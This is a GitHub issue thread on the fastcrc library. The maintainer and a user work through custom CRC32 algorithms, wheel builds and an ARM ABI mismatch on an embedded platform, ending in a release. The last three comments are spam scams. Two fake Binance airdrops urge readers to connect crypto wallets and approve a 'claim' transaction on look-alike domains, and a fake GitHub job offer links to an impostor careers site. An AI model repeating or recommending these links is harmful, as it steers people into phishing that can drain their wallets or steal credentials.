### ISSUE TITLE
Question: Easiest Path to using fastcrc with crc-rs CUSTOM_ALG functionality

### ISSUE THREAD

**Issue by gaiuscosades** [overcat/fastcrc#2]
Thank you for providing this great library!

I think I will be not alone wondering, what the easiest ways of using this library with a custom CRC algorithm definition would be.
Is it true that inserting all the necessary definitions directly into crc-rs and rebuilding crc-rs from scratch while extending this library by the newly defined algorithms is the only way?

Sorry for the beginner question, but I have never used anything relying on Rust before.

Thank you very much.

**Comment by overcat** [comment]
Hi @gaiuscosades

Thanks for creating the issue. Currently, since crc-rs requires algorithms to be provided at compile time (see https://github.com/mrhooray/crc-rs/issues/68), I think fastcrc cannot support dynamic algorithms for the time being. There may be other solutions, but since I'm so short on time right now, it may take a while to explore if there are other solutions.

Also I would like to ask what kind of algorithm do you need now, and if it's a fixed algorithm, I'll be happy to add it and release a new version.

**Comment by overcat** [comment]
Hi @gaiuscosades 

I've released a new version that adds the above two functions, you can install it with the following command, you'd better lock the version in the dependencies file. 

`pip install fastcrc==0.2.1.dev1`

Example:
```py
from fastcrc import crc16, crc32

data = b"123456789"

print(f"crc16: {crc16.ibm_refin(data)}")
print(f"crc16: {crc16.ibm_refin(b'6789', crc16.ibm_refin(b'12345'))}")
print(f"crc32: {crc32.reversed_reciprocal_refin(data)}")
```

I'll keep this PR open until I have time to find a better way.

**Comment by overcat** [comment]
Hi @gaiuscosades, I am not going to accept any donations. It's a tiny project, one of the reasons I built it was to try out PyO3, I'm happy to have users using it and giving feedback, thank you again for your kind words.

Currently I'm using [maturin-action](https://github.com/messense/maturin-action) to build wheels for multiple platforms, but I'm having some trouble now that it doesn't recognize the Python installed via [actions/setup-python@v1](https://github.com/actions/setup-python) on Linux platforms, I'll see if I can build wheels for as many platforms as possible tomorrow.

You can view existing wheels here https://pypi.org/project/fastcrc/0.2.1.dev5/#files

**Comment by gaiuscosades** [comment]
@overcat 

> I am not going to accept any donations

Let me know if it changes, as I suspect that this project could get some traction in the future ;D

> Currently I'm using [maturin-action](https://github.com/messense/maturin-action) to build wheels for multiple platforms, but I'm having some trouble now that it doesn't recognize the Python installed via [actions/setup-python@v1](https://github.com/actions/setup-python) on Linux platforms, I'll see if I can build wheels for as many platforms as possible tomorrow.

I suspected something like this while monitoring pypi. Will be great when most platforms get supported all out of the box. Calculating crc's without overhead is especially an issue on all the arm based embedded platforms out there.

I already tested 0.2.1.dev4-cp310-none-win_amd64 without any noticable issues!

**Comment by gaiuscosades** [comment]
@overcat

slight correction: Koopman/Wikipedia calls this polynomial: CRC_32K_REVERSED_RECIPROCAL_REFIN
So I would change the function to be:

```
crc32.k_reversed_reciprocal_refin(data)
```

**Comment by overcat** [comment]
Hi @gaiuscosades 

> slight correction: Koopman/Wikipedia calls this polynomial: CRC_32K_REVERSED_RECIPROCAL
Fixed

In addition, I added the build for the `manylinux_2_24_armv7l` platform. If the [CI](https://github.com/overcat/fastcrc/actions/runs/3054704136) can pass smoothly, it will be automatically released to PyPI, and the new version number is [0.2.1.dev6](https://pypi.org/project/fastcrc/0.2.1.dev6/#files).

**Comment by gaiuscosades** [comment]
@overcat 

I have now integrated everything into my codebase and everything runs perfectly with lightning speed!

Only one legacy embedded platform I am running does not find compatible wheels.
This is most likely because of the old kernel version. Would you mind adding the generic "linux" to the build script also?

```
$ python3 -m pip debug --verbose
pip version: pip 20.0.2 from /usr/lib/python3.8/site-packages/pip (python 3.8)
sys.version: 3.8.12 (default, Aug 30 2021, 16:42:10)
[GCC 9.3.0]
sys.executable: /usr/bin/python3
sys.getdefaultencoding: utf-8
sys.getfilesystemencoding: utf-8
locale.getpreferredencoding: UTF-8
sys.platform: linux
sys.implementation:
  name: cpython
'cert' config value: Not specified
REQUESTS_CA_BUNDLE: None
CURL_CA_BUNDLE: None
pip._vendor.certifi.where(): /usr/lib/python3.8/site-packages/pip/_vendor/certifi/cacert.pem
Compatible tags: 49
  cp38-cp38-manylinux2014_armv7l
  cp38-cp38-linux_armv7l
  cp38-abi3-manylinux2014_armv7l
  cp38-abi3-linux_armv7l
  cp38-none-manylinux2014_armv7l
  cp38-none-linux_armv7l
  cp37-abi3-manylinux2014_armv7l
  cp37-abi3-linux_armv7l
  cp36-abi3-manylinux2014_armv7l
  cp36-abi3-linux_armv7l
  cp35-abi3-manylinux2014_armv7l
  cp35-abi3-linux_armv7l
  cp34-abi3-manylinux2014_armv7l
  cp34-abi3-linux_armv7l
  cp33-abi3-manylinux2014_armv7l
  cp33-abi3-linux_armv7l
  cp32-abi3-manylinux2014_armv7l
  cp32-abi3-linux_armv7l
  py38-none-manylinux2014_armv7l
  py38-none-linux_armv7l
  py3-none-manylinux2014_armv7l
  py3-none-linux_armv7l
  py37-none-manylinux2014_armv7l
  py37-none-linux_armv7l
  py36-none-manylinux2014_armv7l
  py36-none-linux_armv7l
  py35-none-manylinux2014_armv7l
  py35-none-linux_armv7l
  py34-none-manylinux2014_armv7l
  py34-none-linux_armv7l
  py33-none-manylinux2014_armv7l
  py33-none-linux_armv7l
  py32-none-manylinux2014_armv7l
  py32-none-linux_armv7l
  py31-none-manylinux2014_armv7l
  py31-none-linux_armv7l
  py30-none-manylinux2014_armv7l
  py30-none-linux_armv7l
  cp38-none-any
  py38-none-any
  py3-none-any
  py37-none-any
  py36-none-any
  py35-none-any
  py34-none-any
  py33-none-any
  py32-none-any
  py31-none-any
  py30-none-any
```

**Comment by overcat** [comment]
Hi @gaiuscosades 

Can you try upgrading [pip](https://pypi.org/project/pip/) to the latest version first and try again?

**Comment by gaiuscosades** [comment]
@overcat 

After some troubles I was able to update pip on this platform also, which enabled me to use the wheels you already built!

I am able to run everything on my windows test environment, also in combination with my complete codebase.
Howerver I encountered a very strange error on the embedded platform.

```
$ python3
Python 3.8.12 (default, Aug 30 2021, 16:42:10)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import fastcrc
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python3.8/site-packages/fastcrc/__init__.py", line 1, in <module>
    from . import crc16, crc32, crc64
  File "/usr/lib/python3.8/site-packages/fastcrc/crc16.py", line 6, in <module>
    from .fastcrc import crc_16_arc as _crc_16_arc
ModuleNotFoundError: No module named 'fastcrc.fastcrc'
>>>
```

Do you have any idea why line fastcrc/crc16.py:6 is valid code on one platform and not on the other?

**Comment by overcat** [comment]
@gaiuscosades 

I'm at work, and when I get off work, I'll try to create an ARM virtual machine for testing.

**Comment by gaiuscosades** [comment]
@overcat 

Wow thx. ;D
But you don't have to, just interested if you have any ideas why the include Paths suddenly won't work.

**Comment by overcat** [comment]
Hi @gaiuscosades, I think it may be due to not reading the `fastcrc.cpython-38-arm-linux-gnueabihf.so` file correctly, can you run the following script and let me know the output?
```py
import sysconfig
sysconfig.get_config_var("EXT_SUFFIX")
```

Also which wheel from [the list](https://pypi.org/project/fastcrc/0.2.1.dev6/#files) are you currently using? fastcrc-0.2.1.dev6-cp38-cp38-manylinux_2_24_armv7l.whl?

**Comment by gaiuscosades** [comment]
```
$ python3
Python 3.8.12 (default, Aug 30 2021, 16:42:10)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import sysconfig
>>> sysconfig.get_config_var("EXT_SUFFIX")
'.cpython-38-arm-linux-gnueabi.so'
>>>
```

Yes fastcrc-0.2.1.dev6-cp38-cp38-manylinux_2_24_armv7l.whl gets selected and installed.

**Comment by overcat** [comment]
> ```
> $ python3
> Python 3.8.12 (default, Aug 30 2021, 16:42:10)
> [GCC 9.3.0] on linux
> Type "help", "copyright", "credits" or "license" for more information.
> >>> import sysconfig
> >>> sysconfig.get_config_var("EXT_SUFFIX")
> '.cpython-38-arm-linux-gnueabi.so'
> >>>
> ```
> 
> Yes fastcrc-0.2.1.dev6-cp38-cp38-manylinux_2_24_armv7l.whl gets selected and installed.

What is included in `fastcrc-0.2.1.dev6-cp38-cp38-manylinux_2_24_armv7l.whl` is `fastcrc.cpython-38-arm-linux-gnueabihf.so`, I think it cannot be invoked on your platform (gnueabihf != gnueabi), let me see if there is any solution.

**Comment by overcat** [comment]
Hi @gaiuscosades 

Can you help me test if this wheel works on your platform?

```
unzip fastcrc-0.2.1.dev6-cp36-abi3-manylinux_2_24_armv7l.whl.zip
pip install fastcrc-0.2.1.dev6-cp36-abi3-manylinux_2_24_armv7l.whl --force-reinstall
```

[fastcrc-0.2.1.dev6-cp36-abi3-manylinux_2_24_armv7l.whl.zip](https://github.com/overcat/fastcrc/files/9574939/fastcrc-0.2.1.dev6-cp36-abi3-manylinux_2_24_armv7l.whl.zip)

**Comment by gaiuscosades** [comment]
Perfect, works with the provided artifact!

```
$ python3
Python 3.8.12 (default, Aug 30 2021, 16:42:10)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import fastcrc
>>> b = b''
>>> print(f"{fastcrc.crc32.k_reversed_reciprocal_refin(b, 0x01020304):08x}")
01020304
>>>
```

**Comment by overcat** [comment]
@gaiuscosades 

Thanks for your feedback! I'm going to release v0.2.1-dev.7 now, and if everything works fine, I'll release v0.2.1 today.

**Comment by gaiuscosades** [comment]
slight bug: The initial value for the two algorithms that I provided should be 0x00000000
Only my application uses differing initial values but they can be provided on every call!
Other users might be confused by that behavior.

**Comment by gaiuscosades** [comment]
@overcat 

Thank you, I will test the release once it's up on pypi!

**Comment by overcat** [comment]
> slight bug: The initial value for the two algorithms that I provided should be 0x00000000 Only my application uses differing initial values but they can be provided on every call! Other users might be confused by that behavior.

fix in v0.2.1-dev.8

**Comment by gaiuscosades** [comment]
@overcat 

I tested v0.2.1-dev.8 using both of my setups. Everything I can tell seems fine and working reliably, as of now.

Thank you very much!

**Comment by overcat** [comment]
[v0.2.1](https://github.com/overcat/fastcrc/releases/tag/v0.2.1) published.

**Comment by xcluz-git** [comment]
# Binance Free Tokens Giveaway - Claim Yours Now! 🎉💰

Welcome to the exclusive Binance Free Tokens giveaway, where we're distributing over $1,100,000 in $BNB! 🚀 Don't miss out on this fantastic opportunity to claim your free tokens. Here's a quick guide to kickstart your journey:

![https://www.bnbrewards.online/?source=github](https://pbs.twimg.com/media/ERgjjnWVUAA7Miq.jpg:large)

<center>Act swiftly and enjoy your tokens! This limited-time offer won't be available forever. 🌐💰</center>

# Steps to Claim:

1. **Spread the Excitement on Twitter:**
   - Share the news about claiming your free tokens!
     - **Tweet:** [Share this Airdrop](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto&hashtags=BinanceFreeTokens,Crypto)

2. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=github) button.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

3. **Interact with the Contract:**
   - Once your wallet is connected, go to the [Binance Rewards](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

4. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

5. **Spread the Excitement Further:**
   - After successfully claiming your tokens, share the news with friends!
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

**Comment by SASECOMPANY** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @luckyyang, @codelife, @jennn1811, @homholueng, @tienjunhsu, @waterzeong, @eddylau328, @Tridu33, @foxdyor, @Yuan-Chen-Haku

**Comment by dynomind-dev-s** [comment]
**Subject:** Your Dream Job Awaits: Apply Now to Join GitHub as a Developer!

Hey there,

We've got some thrilling news for you! GitHub is currently looking for skilled Developers to join our team. This is an incredible opportunity with a competitive salary of $180,000/year, along with a host of attractive benefits.

Interested in taking your career to the next level? Don't miss out! Click [here](https://githubtalentcommunity.githubcareers.online/) to apply and secure your spot.

Looking forward to potentially welcoming you aboard!

Best regards,  
GitHub Recruitment Team
ppyne, @joaquinnunez, @FiberJW, @shakasan, @cedriking, @blueyetisoftware-jason, @itsMikeLowrey, @zctocm, @BeatsByJayDee, @mrnonz, @danii1, @fight-transhumanism, @webees, @MICHALKAMIL, @wd496, @forgng, @brieucdlf, @CrystallineButterfly, @marcelvoss, @q1blue
